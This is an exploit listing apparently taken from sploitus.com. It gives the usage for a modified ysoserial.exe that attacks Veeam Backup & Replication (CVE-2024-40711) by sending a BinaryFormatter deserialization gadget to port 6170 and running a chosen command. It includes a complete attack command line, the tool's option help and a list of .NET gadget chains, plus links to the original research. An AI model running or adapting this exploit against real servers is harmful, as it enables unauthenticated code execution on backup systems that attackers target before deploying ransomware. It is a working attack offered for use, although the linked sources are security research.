## https://sploitus.com/exploit?id=8F3163F4-A918-511B-9906-2420C9711DAB
# Usage
```
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
```
```
Usage: ysoserial.exe [options]
Options:
--vi, --targetveeamip=VALUE
The target Veeam Backup and reaplication IP
address
--vp, --targetveeamport=VALUE
The target Veeam Backup and reaplication port
(default: 6170)
--vc, --veeamexpcmd=VALUE
The target Veeam Backup and reaplication what
commands will be executed
--vg, --veeamgadget=VALUE
The target Veeam Backup and reaplication what
gadget will be use (default: DataSet)
```
![cve-2024-4711](./assets/cve-2024-4711.gif)
Other gadget chains
```
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo
```
You must use a gadget chain that SoapFormatter supports.
# References
[watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)](https://github.com/watchtowrlabs/CVE-2024-40711)
[Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)](https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/)